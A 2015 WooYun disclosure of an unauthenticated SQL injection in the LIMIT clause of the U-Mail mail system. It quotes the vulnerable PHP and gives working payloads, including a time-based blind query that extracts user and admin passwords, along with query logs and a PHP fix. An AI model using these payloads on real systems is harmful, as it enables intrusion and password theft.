
Vulnerability Summary

Defect ID: wooyun-2015-094661

Title: U-Mail mail system injection 2 (SQL injection in the MySQL LIMIT clause, no login required, with a script for retrieving user passwords attached)

Affected vendor: U-Mail

Author: Ano_Tom

Submitted: 2015-01-30 12:53

Fixed: 2015-05-05 08:26

Published: 2015-05-05 08:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-01-30: Details sent to the vendor, awaiting vendor response
2015-02-04: Vendor confirmed; details disclosed to the vendor only
2015-02-07: Details opened to third-party security partners
2015-03-31: Details opened to core white hats and domain experts
2015-04-10: Details opened to regular white hats
2015-04-20: Details opened to intern white hats
2015-05-05: Details disclosed to the public

Brief description:

SQL injection in the MySQL LIMIT clause: insufficient filtering yields a blind injection that allows usernames and passwords to be extracted without logging in.

Detailed description:

Last time I only searched under the client directory; today I happened to search under the fast directory and found another instance.
Note: every function under the client directory requires login, whereas some of the functions under fast can be executed without logging in, although they cannot read mail and so on.
The vulnerability has the same root cause as the previous one but lives in a different file. Here the access control is lax and any user can reach it, so SQL injection is possible without logging in. sleep() cannot be used in the LIMIT clause, so BENCHMARK is used for the time delay.
Vulnerable file: /fast/oab/module/operates.php, code:

if ( ACTION == "member-get" )
{
    $dept_id = gss( $_GET['dept_id'] );
    $keyword = gss( $_GET['keyword'] );
    $page = $_GET['page'] ? gss( $_GET['page'] ) : 1;
    //limit
    $limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25; //user-controlled variable
    $orderby = gss( $_GET['orderby'] );
    $is_reverse = gss( $_GET['is_reverse'] );
    $data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 );
    $department_list = create_array( $data_cache, "dept_id", "name" );
    $where = "";
    if ( $dept_id && $dept_id != "-1" )
    {
        $Tree = $Department->getTreeObject( );
        $Tree->set_data_cache( $data_cache );
        $Tree->sort_data( -1, 1 );
        $dept_ids = $Tree->get_child_id( $dept_id );
        $user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );
        $where = "t1.UserID IN (".$user_ids.")";
    }
    if ( $keyword )
    {
        if ( $where )
        {
            $where .= " AND ";
        }
        if ( strpos( $keyword, "@" ) )
        {
            $key_tmp = explode( "@", $keyword );
            $keyword = $key_tmp[0];
        }
        $where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";
    }
    switch ( $orderby )
    {
        case "fullname" :
            $orderby = "t1.FullName";
            break;
        case "mailbox" :
            $orderby = "t1.Mailbox";
            break;
        case "sex" :
            $orderby = "t2.sex";
            break;
        case "birthday" :
            $orderby = "t2.birthday";
            break;
        case "mobile" :
            $orderby = "t2.mobil";
            break;
        case "tel" :
            $orderby = "t2.teleextension";
            break;
        case "position" :
            $orderby = "t2.headship";
            break;
        case "group_num" :
            $orderby = "t2.o_group";
            break;
        case "email" :
            $orderby = "t1.Mailbox";
            break;
        default :
            $orderby = "";
    }
    $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 ); //enters the function
    // ...
}


$limit is user-controlled, so injection results. Exploitation process:
First, POST data to the URL. (Note: this interface does not actually grant arbitrary login; after it runs, only a handful of functions can be executed, so if one of them has a SQL flaw, a corresponding unauthenticated SQL injection arises. For example, if the security question could be updated, that would be a flaw allowing any user's password to be obtained. But the reachable functions are limited and cannot read users' mail and so on.)

[screenshot: a.png]


After obtaining authentication, request the following:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1)
The result is as follows:

[screenshot: b.png]


The SQL statement executed is:

150128 21:44:43	 3142 Connect	umail@localhost on 
3142 Query SET NAMES 'UTF8'
3142 Init DB umail
3142 Query SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
3142 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
3142 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)
3142 Quit


[screenshot: c.png]


Since errors are not echoed back, we perform a blind injection; the request is:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)

[screenshot: d.png]


The SQL executed is:

150128 21:47:16	 3144 Connect	umail@localhost on 
3144 Query SET NAMES 'UTF8'
3144 Init DB umail
3144 Query SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
3144 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
3144 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)


Injection successful.
A script can therefore enumerate different user accounts and passwords. For the administrators:
#select+password+from+userlist+where+userid=2 (system user)
#select+password+from+web_usr+where+usr_code=1 (administrator user)
#select+password+from+web_usr+where+usr_code=2 (admin user)
For ordinary users, iterate over userid to obtain username and password.
Blind injection script attached (only half written, no binary search etc.; make do with it).
Local test:

[screenshot: j.jpg]


And screenshots of the admin login on the official site:

[screenshot: e.png]

[screenshot: f.png]

Proof of vulnerability:

As above.

Fix:

intval
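As an added example (not U-Mail's code and not from the original report), the following shows why quote-escaping such as gss() cannot protect the numeric LIMIT context in member-get, and a hardened replacement for the page/limit handling. It assumes gss() behaves like addslashes() and that the clause is built as LIMIT offset,count; both are assumptions.

```php
<?php
// Added example (not U-Mail's code, not from the original report). The
// member-get handler passes $_GET['limit'] through gss() and on into the
// LIMIT clause. Quote-escaping cannot protect a numeric context: the payload
// "1,1 PROCEDURE analyse(...)" contains no quote, so it survives unchanged.
// Assumption: the clause is built as "LIMIT <offset>,<count>".

// Stand-in for gss(); assumed here to behave like addslashes().
function gss_like_escape(string $v): string
{
    return addslashes($v);
}

// Vulnerable pattern, as in the report: escaped text concatenated into LIMIT.
function limit_clause_vulnerable(string $limitParam): string
{
    $limit = $limitParam !== '' ? gss_like_escape($limitParam) : '25';
    return 'LIMIT 0,' . $limit;
}

// Hardened pattern: accept only an unsigned decimal integer within bounds.
// intval() alone (the report's fix) also neutralises the payload, since
// intval("1,1 PROCEDURE ...") is 1, but a strict check rejects junk outright
// instead of silently turning it into a valid page size.
function safe_page_size(?string $limitParam, int $default = 25, int $max = 200): int
{
    if ($limitParam === null || !ctype_digit($limitParam)) {
        return $default;   // rejects "1,1 PROCEDURE ...", "-1", "1e3", ""
    }
    return max(1, min((int) $limitParam, $max));
}

function limit_clause_hardened(?string $pageParam, ?string $limitParam): string
{
    $size = safe_page_size($limitParam);
    $page = ($pageParam !== null && ctype_digit($pageParam)) ? max(1, (int) $pageParam) : 1;
    // %d forces integer formatting; no attacker-supplied text reaches the SQL.
    return sprintf('LIMIT %d,%d', ($page - 1) * $size, $size);
}

// Constructed input mirroring the report's first payload.
$payload = '1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)';
echo limit_clause_vulnerable($payload), PHP_EOL;     // payload reaches the query intact
echo limit_clause_hardened('2', $payload), PHP_EOL;  // falls back to the default page size
echo limit_clause_hardened('3', '10'), PHP_EOL;
```

The same rule applies to $page and to any other value that lands in ORDER BY or LIMIT: whitelist or coerce to an integer, because escaping functions only defend string literals.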

Copyright notice: when reposting, please credit the source Ano_Tom@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-02-04 08:24

Vendor reply:

Latest status:

None yet